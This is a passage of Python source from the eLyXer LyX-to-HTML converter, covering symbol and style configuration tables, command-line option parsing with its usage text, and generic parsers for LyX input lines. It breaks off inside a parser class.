u'\\DownLeftTeeVector': u'⥞', u'\\DownLeftVectorBar': u'⥖',
u'\\DownRightTeeVector': u'⥟', u'\\DownRightVectorBar': u'⥗',
u'\\Equal': u'⩵', u'\\LeftArrowBar': u'⇤', u'\\LeftDownTeeVector': u'⥡',
u'\\LeftDownVectorBar': u'⥙', u'\\LeftTeeVector': u'⥚',
u'\\LeftTriangleBar': u'⧏', u'\\LeftUpTeeVector': u'⥠',
u'\\LeftUpVectorBar': u'⥘', u'\\LeftVectorBar': u'⥒',
u'\\Leftrightarrow': u'⇔', u'\\Longmapsfrom': u'⟽', u'\\Longmapsto': u'⟾',
u'\\MapsDown': u'↧', u'\\MapsUp': u'↥', u'\\Nearrow': u'⇗',
u'\\NestedGreaterGreater': u'⪢', u'\\NestedLessLess': u'⪡',
u'\\NotGreaterLess': u'≹', u'\\NotGreaterTilde': u'≵',
u'\\NotLessTilde': u'≴', u'\\Nwarrow': u'⇖', u'\\Proportion': u'∷',
u'\\RightArrowBar': u'⇥', u'\\RightDownTeeVector': u'⥝',
u'\\RightDownVectorBar': u'⥕', u'\\RightTeeVector': u'⥛',
u'\\RightTriangleBar': u'⧐', u'\\RightUpTeeVector': u'⥜',
u'\\RightUpVectorBar': u'⥔', u'\\RightVectorBar': u'⥓',
u'\\Rightarrow': u'⇒', u'\\Same': u'⩶', u'\\Searrow': u'⇘',
u'\\Swarrow': u'⇙', u'\\Top': u'⫪', u'\\UpArrowBar': u'⤒', u'\\VDash': u'⊫',
u'\\approx': u'≈', u'\\approxeq': u'≊', u'\\backsim': u'∽', u'\\barin': u'⋶',
u'\\barleftharpoon': u'⥫', u'\\barrightharpoon': u'⥭', u'\\bij': u'⤖',
u'\\coloneq': u'≔', u'\\corresponds': u'≙', u'\\curlyeqprec': u'⋞',
u'\\curlyeqsucc': u'⋟', u'\\dashrightarrow': u'⇢', u'\\dlsh': u'↲',
u'\\downdownharpoons': u'⥥', u'\\downuparrows': u'⇵',
u'\\downupharpoons': u'⥯', u'\\drsh': u'↳', u'\\eqslantgtr': u'⪖',
u'\\eqslantless': u'⪕', u'\\equiv': u'≡', u'\\ffun': u'⇻', u'\\finj': u'⤕',
u'\\ge': u'≥', u'\\geq': u'≥', u'\\ggcurly': u'⪼', u'\\gnapprox': u'⪊',
u'\\gneq': u'⪈', u'\\gtrapprox': u'⪆', u'\\hash': u'⋕', u'\\iddots': u'⋰',
u'\\implies': u' ⇒ ', u'\\in': u'∈', u'\\le': u'≤', u'\\leftarrow': u'←',
u'\\leftarrowtriangle': u'⇽', u'\\leftbarharpoon': u'⥪',
u'\\leftrightarrowtriangle': u'⇿', u'\\leftrightharpoon': u'⥊',
u'\\leftrightharpoondown': u'⥐', u'\\leftrightharpoonup': u'⥎',
u'\\leftrightsquigarrow': u'↭', u'\\leftslice': u'⪦',
u'\\leftsquigarrow': u'⇜', u'\\leftupdownharpoon': u'⥑', u'\\leq': u'≤',
u'\\lessapprox': u'⪅', u'\\llcurly': u'⪻', u'\\lnapprox': u'⪉',
u'\\lneq': u'⪇', u'\\longmapsfrom': u'⟻', u'\\multimapboth': u'⧟',
u'\\multimapdotbothA': u'⊶', u'\\multimapdotbothB': u'⊷',
u'\\multimapinv': u'⟜', u'\\nVdash': u'⊮', u'\\ne': u'≠', u'\\neq': u'≠',
u'\\ngeq': u'≱', u'\\nleq': u'≰', u'\\nni': u'∌', u'\\not\\in': u'∉',
u'\\notasymp': u'≭', u'\\npreceq': u'⋠', u'\\nsqsubseteq': u'⋢',
u'\\nsqsupseteq': u'⋣', u'\\nsubset': u'⊄', u'\\nsucceq': u'⋡',
u'\\pfun': u'⇸', u'\\pinj': u'⤔', u'\\precapprox': u'⪷', u'\\preceqq': u'⪳',
u'\\precnapprox': u'⪹', u'\\precnsim': u'⋨', u'\\propto': u'∝',
u'\\psur': u'⤀', u'\\rightarrow': u'→', u'\\rightarrowtriangle': u'⇾',
u'\\rightbarharpoon': u'⥬', u'\\rightleftharpoon': u'⥋',
u'\\rightslice': u'⪧', u'\\rightsquigarrow': u'⇝',
u'\\rightupdownharpoon': u'⥏', u'\\sim': u'~', u'\\strictfi': u'⥼',
u'\\strictif': u'⥽', u'\\subset': u'⊂', u'\\subseteq': u'⊆',
u'\\subsetneq': u'⊊', u'\\succapprox': u'⪸', u'\\succeqq': u'⪴',
u'\\succnapprox': u'⪺', u'\\supset': u'⊃', u'\\supseteq': u'⊇',
u'\\supsetneq': u'⊋', u'\\times': u'×', u'\\to': u'→',
u'\\updownarrows': u'⇅', u'\\updownharpoons': u'⥮', u'\\upupharpoons': u'⥣',
u'\\vartriangleleft': u'⊲', u'\\vartriangleright': u'⊳',
}
starts = {
u'beginafter': u'}', u'beginbefore': u'\\begin{', u'bracket': u'{',
u'command': u'\\', u'comment': u'%', u'complex': u'\\[', u'simple': u'$',
u'squarebracket': u'[', u'unnumbered': u'*',
}
symbolfunctions = {
u'^': u'sup', u'_': u'sub',
}
textfunctions = {
u'\\mbox': u'span class="mbox"', u'\\text': u'span class="text"',
u'\\textbf': u'b', u'\\textipa': u'span class="textipa"', u'\\textit': u'i',
u'\\textnormal': u'span class="textnormal"',
u'\\textrm': u'span class="textrm"',
u'\\textsc': u'span class="versalitas"',
u'\\textsf': u'span class="textsf"', u'\\textsl': u'i', u'\\texttt': u'tt',
u'\\textup': u'span class="normal"',
}
unmodified = {
u'characters': [u'.', u'*', u'€', u'(', u')', u'[', u']', u'·', u'!', u';', u'|', u'§', u'"',],
}
urls = {
u'googlecharts': u'http://chart.googleapis.com/chart?cht=tx&chl=',
}
class GeneralConfig(object):
    "Configuration class from elyxer.config file"
    # eLyXer release metadata: release date, highest supported LyX file
    # format, and the version number shown by --version.
    version = {
        u'date': u'2015-02-26', u'lyxformat': u'413', u'number': u'1.2.5',
    }
class HeaderConfig(object):
    "Configuration class from elyxer.config file"
    # Symbolic names for LyX header keys mapped to the literal commands
    # that introduce them in the .lyx file header.
    parameters = {
        u'beginpreamble': u'\\begin_preamble', u'branch': u'\\branch',
        u'documentclass': u'\\textclass', u'endbranch': u'\\end_branch',
        u'endpreamble': u'\\end_preamble', u'language': u'\\language',
        u'lstset': u'\\lstset', u'outputchanges': u'\\output_changes',
        u'paragraphseparation': u'\\paragraph_separation',
        u'pdftitle': u'\\pdf_title', u'secnumdepth': u'\\secnumdepth',
        u'tocdepth': u'\\tocdepth',
    }
    # Known document classes grouped into the two broad layout families.
    styles = {
        u'article': [u'article', u'aastex', u'aapaper', u'acmsiggraph', u'sigplanconf', u'achemso', u'amsart', u'apa', u'arab-article', u'armenian-article', u'article-beamer', u'chess', u'dtk', u'elsarticle', u'heb-article', u'IEEEtran', u'iopart', u'kluwer', u'scrarticle-beamer', u'scrartcl', u'extarticle', u'paper', u'mwart', u'revtex4', u'spie', u'svglobal3', u'ltugboat', u'agu-dtd', u'jgrga', u'agums', u'entcs', u'egs', u'ijmpc', u'ijmpd', u'singlecol-new', u'doublecol-new', u'isprs', u'tarticle', u'jsarticle', u'jarticle', u'jss', u'literate-article', u'siamltex', u'cl2emult', u'llncs', u'svglobal', u'svjog', u'svprobth',],
        u'book': [u'book', u'amsbook', u'scrbook', u'extbook', u'tufte-book', u'report', u'extreport', u'scrreprt', u'memoir', u'tbook', u'jsbook', u'jbook', u'mwbk', u'svmono', u'svmult', u'treport', u'jreport', u'mwrep',],
    }
class ImageConfig(object):
    "Configuration class from elyxer.config file"
    # Shell command templates for each supported image converter; the
    # $-placeholders are presumably substituted at conversion time --
    # confirm against the image-conversion code.
    converters = {
        u'imagemagick': u'convert[ -density $scale][ -define $format:use-cropbox=true] "$input" "$output"',
        u'inkscape': u'inkscape "$input" --export-png="$output"',
        u'lyx': u'lyx -C "$input" "$output"',
    }
    # Input file extensions mapped to the format name used for the
    # ImageMagick use-cropbox define above.
    cropboxformats = {
        u'.eps': u'ps', u'.pdf': u'pdf', u'.ps': u'ps',
    }
    # Output formats: the default raster extension plus the extensions
    # treated as vector formats.
    formats = {
        u'default': u'.png', u'vector': [u'.svg', u'.eps',],
    }
class LayoutConfig(object):
    "Configuration class from elyxer.config file"
    # Container class names that may be grouped together inside a layout
    # (same key name, 'allowed', as used by ContainerExtractor configs).
    groupable = {
        u'allowed': [u'StringContainer', u'Constant', u'TaggedText', u'Align', u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula',],
    }
class NewfangleConfig(object):
    "Configuration class from elyxer.config file"
    # Marker strings used by the newfangle literate-programming support.
    constants = {
        u'chunkref': u'chunkref{', u'endcommand': u'}', u'endmark': u'>',
        u'startcommand': u'\\', u'startmark': u'=<',
    }
class NumberingConfig(object):
    "Configuration class from elyxer.config file"
    # Heading layouts numbered with arabic numerals ('ordered') versus
    # roman numerals ('roman').
    layouts = {
        u'ordered': [u'Chapter', u'Section', u'Subsection', u'Subsubsection', u'Paragraph',],
        u'roman': [u'Part', u'Book',],
    }
    # Footnote marker symbols, used in this order when symbol marking
    # is selected.
    sequence = {
        u'symbols': [u'*', u'**', u'†', u'‡', u'§', u'§§', u'¶', u'¶¶', u'#', u'##',],
    }
class StyleConfig(object):
    "Configuration class from elyxer.config file"
    # Horizontal space commands mapped to their HTML replacements.
    # NOTE(review): several values look like plain spaces but may be
    # special Unicode space characters (en/em/thin spaces) -- preserve
    # them byte-for-byte when editing.
    hspaces = {
        u'\\enskip{}': u' ', u'\\hfill{}': u'<span class="hfill"> </span>',
        u'\\hspace*{\\fill}': u' ', u'\\hspace*{}': u'', u'\\hspace{}': u' ',
        u'\\negthinspace{}': u'', u'\\qquad{}': u' ', u'\\quad{}': u' ',
        u'\\space{}': u' ', u'\\thinspace{}': u' ', u'~': u' ',
    }
    # Quote style codes mapped to the actual quote glyph; presumably the
    # code is language prefix + l/r (left/right) + d/s (double/single) --
    # confirm against the quote-handling code.
    quotes = {
        u'ald': u'»', u'als': u'›', u'ard': u'«', u'ars': u'‹', u'eld': u'“',
        u'els': u'‘', u'erd': u'”', u'ers': u'’', u'fld': u'«',
        u'fls': u'‹', u'frd': u'»', u'frs': u'›', u'gld': u'„', u'gls': u'‚',
        u'grd': u'“', u'grs': u'‘', u'pld': u'„', u'pls': u'‚', u'prd': u'”',
        u'prs': u'’', u'sld': u'”', u'srd': u'”',
    }
    # Cross-reference formats; the placeholder characters (@, #, ¶, $, ↕)
    # are presumably substituted when the reference is resolved -- confirm.
    referenceformats = {
        u'eqref': u'(@↕)', u'formatted': u'¶↕', u'nameref': u'$↕', u'pageref': u'#↕',
        u'ref': u'@↕', u'vpageref': u'on-page#↕', u'vref': u'@on-page#↕',
    }
    # Length suffixes ignored when parsing sizes.
    size = {
        u'ignoredtexts': [u'col', u'text', u'line', u'page', u'theight', u'pheight',],
    }
    # Vertical space commands mapped to HTML divs.
    vspaces = {
        u'bigskip': u'<div class="bigskip"> </div>',
        u'defskip': u'<div class="defskip"> </div>',
        u'medskip': u'<div class="medskip"> </div>',
        u'smallskip': u'<div class="smallskip"> </div>',
        u'vfill': u'<div class="vfill"> </div>',
    }
class TOCConfig(object):
    "Configuration class from elyxer.config file"
    # ContainerExtractor configuration (allowed/cloned/extracted lists)
    # for pulling plain text out of a container tree.
    extractplain = {
        u'allowed': [u'StringContainer', u'Constant', u'TaggedText', u'Align', u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula',],
        u'cloned': [u'',], u'extracted': [u'',],
    }
    # ContainerExtractor configuration for extracting a title.
    extracttitle = {
        u'allowed': [u'StringContainer', u'Constant', u'Space',],
        u'cloned': [u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula',],
        u'extracted': [u'PlainLayout', u'TaggedText', u'Align', u'Caption', u'StandardLayout', u'FlexInset',],
    }
class TagConfig(object):
    "Configuration class from elyxer.config file"
    # Bar styles mapped to HTML tags.
    barred = {
        u'under': u'u',
    }
    # Font families mapped to their HTML tag or span.
    family = {
        u'sans': u'span class="sans"', u'typewriter': u'tt',
    }
    # Flex (character-style) insets mapped to HTML spans.
    flex = {
        u'CharStyle:Code': u'span class="code"',
        u'CharStyle:MenuItem': u'span class="menuitem"',
        u'Code': u'span class="code"', u'MenuItem': u'span class="menuitem"',
        u'Noun': u'span class="noun"', u'Strong': u'span class="strong"',
    }
    # Layouts whose consecutive paragraphs are grouped into one element.
    group = {
        u'layouts': [u'Quotation', u'Quote',],
    }
    # Paragraph layouts mapped to HTML tags; 'h?' is a placeholder whose
    # heading level is presumably resolved elsewhere -- confirm.
    layouts = {
        u'Center': u'div', u'Chapter': u'h?', u'Date': u'h2', u'Paragraph': u'div',
        u'Part': u'h1', u'Quotation': u'blockquote', u'Quote': u'blockquote',
        u'Section': u'h?', u'Subsection': u'h?', u'Subsubsection': u'h?',
    }
    # List layouts mapped to their HTML list tags.
    listitems = {
        u'Enumerate': u'ol', u'Itemize': u'ul',
    }
    # Note insets; an empty value means the note is dropped from output.
    notes = {
        u'Comment': u'', u'Greyedout': u'span class="greyedout"', u'Note': u'',
    }
    # Sub/superscript mapped to HTML tags.
    script = {
        u'subscript': u'sub', u'superscript': u'sup',
    }
    # Font shapes mapped to HTML tags or spans.
    shaped = {
        u'italic': u'i', u'slanted': u'i', u'smallcaps': u'span class="versalitas"',
    }
class TranslationConfig(object):
    "Configuration class from elyxer.config file"
    # English strings for all generated text: heading labels, float
    # captions, TOC entries, navigation links and footer messages.
    constants = {
        u'Appendix': u'Appendix', u'Book': u'Book', u'Chapter': u'Chapter',
        u'Paragraph': u'Paragraph', u'Part': u'Part', u'Section': u'Section',
        u'Subsection': u'Subsection', u'Subsubsection': u'Subsubsection',
        u'abstract': u'Abstract', u'bibliography': u'Bibliography',
        u'figure': u'figure', u'float-algorithm': u'Algorithm ',
        u'float-figure': u'Figure ', u'float-listing': u'Listing ',
        u'float-table': u'Table ', u'float-tableau': u'Tableau ',
        u'footnotes': u'Footnotes', u'generated-by': u'Document generated by ',
        u'generated-on': u' on ', u'index': u'Index',
        u'jsmath-enable': u'Please enable JavaScript on your browser.',
        u'jsmath-requires': u' requires JavaScript to correctly process the mathematics on this page. ',
        u'jsmath-warning': u'Warning: ', u'list-algorithm': u'List of Algorithms',
        u'list-figure': u'List of Figures', u'list-table': u'List of Tables',
        u'list-tableau': u'List of Tableaux', u'main-page': u'Main page',
        u'next': u'Next', u'nomenclature': u'Nomenclature',
        u'on-page': u' on page ', u'prev': u'Prev', u'references': u'References',
        u'toc': u'Table of Contents', u'toc-for': u'Contents for ', u'up': u'Up',
    }
    # LyX language names mapped to ISO 639-1 language codes.
    languages = {
        u'american': u'en', u'british': u'en', u'deutsch': u'de', u'dutch': u'nl',
        u'english': u'en', u'french': u'fr', u'ngerman': u'de', u'russian': u'ru',
        u'spanish': u'es',
    }
class CommandLineParser(object):
    """A parser for runtime options of the form: --key [value].

    Option values are written as attributes onto the supplied options
    object; the attribute's current value determines how the option is
    read (bool = flag, list = accumulating, anything else = scalar).
    """

    def __init__(self, options):
        # object (or class) whose attributes hold the option defaults
        self.options = options

    def parseoptions(self, args):
        "Parse all leading --options from args; return an error string or None."
        if len(args) == 0:
            return None
        while len(args) > 0 and args[0].startswith('--'):
            key, value = self.readoption(args)
            if not key:
                return 'Option ' + value + ' not recognized'
            if not value:
                return 'Option ' + key + ' needs a value'
            setattr(self.options, key, value)
        return None

    def readoption(self, args):
        """Read and consume one option from args.

        Returns (key, value) on success, (key, None) when a value is
        missing, or (None, badkey) for an unrecognized option.
        """
        arg = args[0][2:]
        del args[0]
        if '=' in arg:
            key = self.readequalskey(arg, args)
        else:
            key = arg.replace('-', '')
        if not hasattr(self.options, key):
            # unknown option: signal it by returning no key
            return None, key
        current = getattr(self.options, key)
        if isinstance(current, bool):
            # boolean options are flags and take no value
            return key, True
        # read the value for the option
        if len(args) == 0:
            return key, None
        if args[0].startswith('"'):
            initial = args[0]
            del args[0]
            return key, self.readquoted(args, initial)
        value = args[0]
        del args[0]
        if isinstance(value, bytes):
            # on Python 2 sys.argv holds byte strings; decode them
            value = value.decode('utf-8')
        if isinstance(current, list):
            # list options accumulate every occurrence
            current.append(value)
            return key, current
        return key, value

    def readquoted(self, args, initial):
        "Read a value spanning several args, delimited by double quotes."
        value = initial[1:]
        while len(args) > 0 and not args[0].endswith('"') and not args[0].startswith('--'):
            value += ' ' + args[0]
            del args[0]
        if len(args) == 0 or args[0].startswith('--'):
            # unterminated quote: no value
            return None
        # Append the closing fragment without its trailing quote and consume
        # it. The original concatenated the *list slice* args[0:-1] to a
        # string (a TypeError for every quoted value) and left the closing
        # token in args; it also emitted stray debug Trace.error output.
        value += ' ' + args[0][:-1]
        del args[0]
        return value

    def readequalskey(self, arg, args):
        "Split a --key=value option; push the value back onto args, return the key."
        split = arg.split('=', 1)
        key = split[0]
        value = split[1]
        args.insert(0, value)
        return key
class Options(object):
    """A set of runtime options.

    All options are class-level attributes so that the whole program
    shares a single set of settings; CommandLineParser writes parsed
    values straight onto this class.
    """
    instance = None
    # program invocation path (argv[0]), used for the usage message
    location = None
    nocopy = False
    copyright = False
    debug = False
    quiet = False
    version = False
    hardversion = False
    versiondate = False
    html = False
    help = False
    showlines = True
    unicode = False
    iso885915 = False
    css = []
    favicon = ''
    title = None
    directory = None
    destdirectory = None
    toc = False
    toctarget = ''
    tocfor = None
    forceformat = None
    lyxformat = False
    target = None
    splitpart = None
    memory = True
    lowmem = False
    nobib = False
    converter = 'imagemagick'
    raw = False
    jsmath = None
    mathjax = None
    nofooter = False
    simplemath = False
    template = None
    noconvert = False
    notoclabels = False
    # footnote presentation flags; recomputed by parsefootnotes()
    letterfoot = True
    numberfoot = False
    symbolfoot = False
    hoverfoot = True
    marginfoot = False
    endfoot = False
    supfoot = True
    alignfoot = False
    footnotes = None
    imageformat = None
    copyimages = False
    googlecharts = False
    embedcss = []
    branches = dict()

    def parseoptions(self, args):
        "Parse command line options"
        Options.location = args[0]
        del args[0]
        parser = CommandLineParser(Options)
        result = parser.parseoptions(args)
        if result:
            Trace.error(result)
            self.usage()
        self.processoptions()

    def processoptions(self):
        "Process all options parsed."
        if Options.help:
            self.usage()
        if Options.version:
            self.showversion()
        if Options.hardversion:
            self.showhardversion()
        if Options.versiondate:
            self.showversiondate()
        if Options.lyxformat:
            self.showlyxformat()
        if Options.splitpart:
            try:
                Options.splitpart = int(Options.splitpart)
                if Options.splitpart <= 0:
                    Trace.error('--splitpart requires a number bigger than zero')
                    self.usage()
            except (ValueError, TypeError):
                # narrow catch: the previous bare 'except:' also swallowed
                # the SystemExit raised by usage() above, causing a second,
                # misleading error message before exiting
                Trace.error('--splitpart needs a numeric argument, not ' + Options.splitpart)
                self.usage()
        if Options.lowmem or Options.toc or Options.tocfor:
            # these modes process the document on the fly
            Options.memory = False
        self.parsefootnotes()
        if Options.forceformat and not Options.imageformat:
            Options.imageformat = Options.forceformat
        if Options.imageformat == 'copy':
            Options.copyimages = True
        if Options.css == []:
            Options.css = ['http://elyxer.nongnu.org/lyx.css']
        if Options.html:
            Options.simplemath = True
        if Options.toc and not Options.tocfor:
            Trace.error('Option --toc is deprecated; use --tocfor "page" instead')
            Options.tocfor = Options.toctarget
        if Options.nocopy:
            Trace.error('Option --nocopy is deprecated; it is no longer needed')
        if Options.jsmath:
            Trace.error('Option --jsmath is deprecated; use --mathjax instead')
        # mirror options into Trace: every Trace attribute ending in 'mode'
        # is set from the option with the same name minus that suffix
        for param in dir(Trace):
            if param.endswith('mode'):
                setattr(Trace, param, getattr(self, param[:-4]))

    def usage(self):
        "Show correct usage and exit."
        Trace.error('Usage: ' + os.path.basename(Options.location) + ' [options] [filein] [fileout]')
        Trace.error('Convert LyX input file "filein" to HTML file "fileout".')
        Trace.error('If filein (or fileout) is not given use standard input (or output).')
        Trace.error('Main program of the eLyXer package (http://elyxer.nongnu.org/).')
        self.showoptions()

    def parsefootnotes(self):
        "Parse the combined --footnotes option into the individual flags."
        if not Options.footnotes:
            return
        # reset the defaults before applying the requested options
        Options.marginfoot = False
        Options.letterfoot = False
        Options.hoverfoot = False
        options = Options.footnotes.split(',')
        for option in options:
            footoption = option + 'foot'
            if hasattr(Options, footoption):
                setattr(Options, footoption, True)
            else:
                Trace.error('Unknown footnotes option: ' + option)
        # fall back to sane defaults if no placement or marking was chosen
        if not Options.endfoot and not Options.marginfoot and not Options.hoverfoot:
            Options.hoverfoot = True
        if not Options.numberfoot and not Options.symbolfoot:
            Options.letterfoot = True

    def showoptions(self):
        "Show all possible options and exit."
        Trace.error('  Common options:')
        Trace.error('    --help:                 show this online help')
        Trace.error('    --quiet:                disables all runtime messages')
        Trace.error('')
        Trace.error('  Advanced options:')
        Trace.error('    --debug:                enable debugging messages (for developers)')
        Trace.error('    --version:              show version number and release date')
        Trace.error('    --lyxformat:            return the highest LyX version supported')
        Trace.error('  Options for HTML output:')
        Trace.error('    --title "title":        set the generated page title')
        Trace.error('    --css "file.css":       use a custom CSS file')
        Trace.error('    --embedcss "file.css":  embed styles from a CSS file into the output')
        Trace.error('    --favicon "icon.ico":   insert the specified favicon in the header.')
        Trace.error('    --html:                 output HTML 4.0 instead of the default XHTML')
        Trace.error('    --unicode:              full Unicode output')
        Trace.error('    --iso885915:            output a document with ISO-8859-15 encoding')
        Trace.error('    --nofooter:             remove the footer "generated by eLyXer"')
        Trace.error('    --simplemath:           do not generate fancy math constructions')
        Trace.error('  Options for image output:')
        Trace.error('    --directory "img_dir":  look for images in the specified directory')
        Trace.error('    --destdirectory "dest": put converted images into this directory')
        Trace.error('    --imageformat ".ext":   image output format, or "copy" to copy images')
        Trace.error('    --noconvert:            do not convert images, use in original locations')
        Trace.error('    --converter "inkscape": use an alternative program to convert images')
        Trace.error('  Options for footnote display:')
        Trace.error('    --numberfoot:           mark footnotes with numbers instead of letters')
        Trace.error('    --symbolfoot:           mark footnotes with symbols (*, **...)')
        Trace.error('    --hoverfoot:            show footnotes as hovering text (default)')
        Trace.error('    --marginfoot:           show footnotes on the page margin')
        Trace.error('    --endfoot:              show footnotes at the end of the page')
        Trace.error('    --supfoot:              use superscript for footnote markers (default)')
        Trace.error('    --alignfoot:            use aligned text for footnote markers')
        Trace.error('    --footnotes "options":  specify several comma-separated footnotes options')
        Trace.error('      Available options are: "number", "symbol", "hover", "margin", "end",')
        Trace.error('        "sup", "align"')
        Trace.error('  Advanced output options:')
        Trace.error('    --splitpart "depth":    split the resulting webpage at the given depth')
        Trace.error('    --tocfor "page":        generate a TOC that points to the given page')
        Trace.error('    --target "frame":       make all links point to the given frame')
        Trace.error('    --notoclabels:          omit the part labels in the TOC, such as Chapter')
        Trace.error('    --lowmem:               do the conversion on the fly (conserve memory)')
        Trace.error('    --raw:                  generate HTML without header or footer.')
        Trace.error('    --mathjax remote:       use MathJax remotely to display equations')
        Trace.error('    --mathjax "URL":        use MathJax from the given URL to display equations')
        Trace.error('    --googlecharts:         use Google Charts to generate formula images')
        Trace.error('    --template "file":      use a template, put everything in <!--$content-->')
        Trace.error('    --copyright:            add a copyright notice at the bottom')
        Trace.error('  Deprecated options:')
        Trace.error('    --toc:                  (deprecated) create a table of contents')
        Trace.error('    --toctarget "page":     (deprecated) generate a TOC for the given page')
        Trace.error('    --nocopy:               (deprecated) maintained for backwards compatibility')
        Trace.error('    --jsmath "URL":         use jsMath from the given URL to display equations')
        sys.exit()

    def showversion(self):
        "Print the current eLyXer version string and exit."
        string = 'eLyXer version ' + GeneralConfig.version['number']
        string += ' (' + GeneralConfig.version['date'] + ')'
        Trace.error(string)
        sys.exit()

    def showhardversion(self):
        "Print just the version string and exit."
        Trace.message(GeneralConfig.version['number'])
        sys.exit()

    def showversiondate(self):
        "Print just the version date and exit."
        Trace.message(GeneralConfig.version['date'])
        sys.exit()

    def showlyxformat(self):
        "Print just the lyxformat parameter and exit."
        Trace.message(GeneralConfig.version['lyxformat'])
        sys.exit()
class BranchOptions(object):
    "A set of options for a LyX branch, keyed by option name."

    def __init__(self, name):
        self.name = name
        # branch options with their defaults; 'color' always present
        self.options = {'color':'#ffffff'}

    def set(self, key, value):
        "Set a branch option; the key must start with the command marker."
        if not key.startswith(ContainerConfig.string['startcommand']):
            Trace.error('Invalid branch option ' + key)
            return
        key = key.replace(ContainerConfig.string['startcommand'], '')
        self.options[key] = value

    def isselected(self):
        "Return if the branch is selected"
        if not 'selected' in self.options:
            return False
        return self.options['selected'] == '1'

    def __unicode__(self):
        "String representation"
        # str() instead of unicode(): the latter does not exist on Python 3,
        # where the __str__ alias below made every str(branch) raise NameError
        return 'options for ' + self.name + ': ' + str(self.options)

    if sys.version_info >= (3, 0):
        __str__ = __unicode__
class Cloner(object):
    "An object used to clone other objects."

    @classmethod
    def clone(cls, original):
        """Return an exact copy of an object.

        The original object's class must have an empty constructor.
        """
        return cls.create(original.__class__)

    @classmethod
    def create(cls, type):
        "Instantiate the given class through __new__ and a no-arg __init__."
        instance = type.__new__(type)
        instance.__init__()
        return instance
class ContainerExtractor(object):
    """Extracts a selected group of containers from a container tree.

    The config map holds three lists of container class names:
    'allowed' containers are included as-is, 'cloned' containers are
    cloned and the clone included, and 'extracted' containers are
    searched recursively. Everything else is silently ignored.
    """

    def __init__(self, config):
        self.allowed = config['allowed']
        self.cloned = config['cloned']
        self.extracted = config['extracted']

    def extract(self, container):
        "Extract the group of selected containers found inside a container."
        found = []
        locate = lambda candidate: candidate.__class__.__name__ in self.allowed + self.cloned
        recursive = lambda candidate: candidate.__class__.__name__ in self.extracted
        process = lambda candidate: self.process(candidate, found)
        container.recursivesearch(locate, recursive, process)
        return found

    def process(self, container, list):
        "Append allowed containers directly; clone cloned ones and append the clone."
        name = container.__class__.__name__
        if name in self.allowed:
            list.append(container)
        elif name in self.cloned:
            list.append(self.safeclone(container))
        else:
            Trace.error('Unknown container class ' + name)

    def safeclone(self, container):
        "Return a new container whose contents are recursively restricted to the safe lists."
        duplicate = Cloner.clone(container)
        duplicate.output = container.output
        duplicate.contents = self.extract(container)
        return duplicate
class Parser(object):
    "A generic parser for LyX-format lines supplied by a reader object."

    def __init__(self):
        # line number where the parsed container begins
        self.begin = 0
        # parameters parsed from "key value" or XML-style lines
        self.parameters = dict()

    def parseheader(self, reader):
        "Consume the header line and return its whitespace-separated parts."
        header = reader.currentline().split()
        reader.nextline()
        self.begin = reader.linenumber
        return header

    def parseparameter(self, reader):
        "Parse one parameter line into self.parameters."
        if reader.currentline().strip().startswith('<'):
            key, value = self.parsexml(reader)
            self.parameters[key] = value
            return
        split = reader.currentline().strip().split(' ', 1)
        reader.nextline()
        if len(split) == 0:
            return
        key = split[0]
        if len(split) == 1:
            # a bare key with no value is treated as a boolean flag
            self.parameters[key] = True
            return
        if not '"' in split[1]:
            self.parameters[key] = split[1].strip()
            return
        # quoted value: keep only the text between the first pair of quotes
        doublesplit = split[1].split('"')
        self.parameters[key] = doublesplit[1]

    def parsexml(self, reader):
        "Parse a parameter in xml form: <param attr1=value...>"
        strip = reader.currentline().strip()
        reader.nextline()
        if not strip.endswith('>'):
            Trace.error('XML parameter ' + strip + ' should be <...>')
        split = strip[1:-1].split()
        if len(split) == 0:
            Trace.error('Empty XML parameter <>')
            return None, None
        key = split[0]
        del split[0]
        if len(split) == 0:
            return key, dict()
        attrs = dict()
        for attr in split:
            if not '=' in attr:
                Trace.error('Erroneous attribute for ' + key + ': ' + attr)
                attr += '="0"'
            parts = attr.split('=')
            attrkey = parts[0]
            # value is whatever sits between the quotes
            value = parts[1].split('"')[1]
            attrs[attrkey] = value
        return key, attrs

    def parseending(self, reader, process):
        "Call process() on each line until the current ending is found."
        # self.ending is set by subclasses (e.g. from ContainerConfig.endings)
        if not self.ending:
            Trace.error('No ending for ' + str(self))
            return
        while not reader.currentline().startswith(self.ending):
            process()

    def parsecontainer(self, reader, contents):
        "Create one container via the factory and append it to contents."
        container = self.factory.createcontainer(reader)
        if container:
            container.parent = self.parent
            contents.append(container)

    def __unicode__(self):
        "Return a description"
        # str() instead of unicode(): the latter is a NameError on Python 3,
        # where the __str__ alias below is active
        return self.__class__.__name__ + ' (' + str(self.begin) + ')'

    if sys.version_info >= (3, 0):
        __str__ = __unicode__
class LoneCommand(Parser):
    "A parser for a command that occupies just one line."

    def parse(self, reader):
        "Consume nothing and produce no contents."
        return []
class TextParser(Parser):
    "A parser for a command and a bit of text"
    # Class-level (shared) stack of pending ending tokens, so that nested
    # TextParsers can recognize each other's endings.
    stack = []
    def __init__(self, container):
        Parser.__init__(self)
        # the ending token expected for this container type, if configured
        self.ending = None
        if container.__class__.__name__ in ContainerConfig.endings:
            self.ending = ContainerConfig.endings[container.__class__.__name__]
        # full list of tokens that terminate this parser; filled in parse()
        self.endings = []
    def parse(self, reader):
        "Parse lines as long as they are text"
        # push our own ending onto the shared stack before parsing
        TextParser.stack.append(self.ending)
        self.endings = TextParser.stack + [ContainerConfig.endings['Layout'],
            ContainerConfig.endings['Inset'], self.ending]
        contents = []
        while not self.isending(reader):
            self.parsecontainer(reader, contents)
        return contents
    def isending(self, reader):
        "Check if text is ending"
        current = reader.currentline().split()
        if len(current) == 0:
            return False
        if current[0] in self.endings:
            # pop a matched ending from the shared stack; an ending that is
            # not on the stack means we are out of sync, so clear it entirely
            if current[0] in TextParser.stack:
                TextParser.stack.remove(current[0])
            else:
                TextParser.stack = []
            return True
        return False
class ExcludingParser(Parser):
    "A parser that stops before, and does not consume, the final line."

    def parse(self, reader):
        "Parse everything up to (and excluding) the ending line."
        contents = []
        def handle():
            self.parsecontainer(reader, contents)
        self.parseending(reader, handle)
        return contents
class BoundedParser(ExcludingParser):
    "A parser delimited by a final line, which it consumes."

    def parse(self, reader):
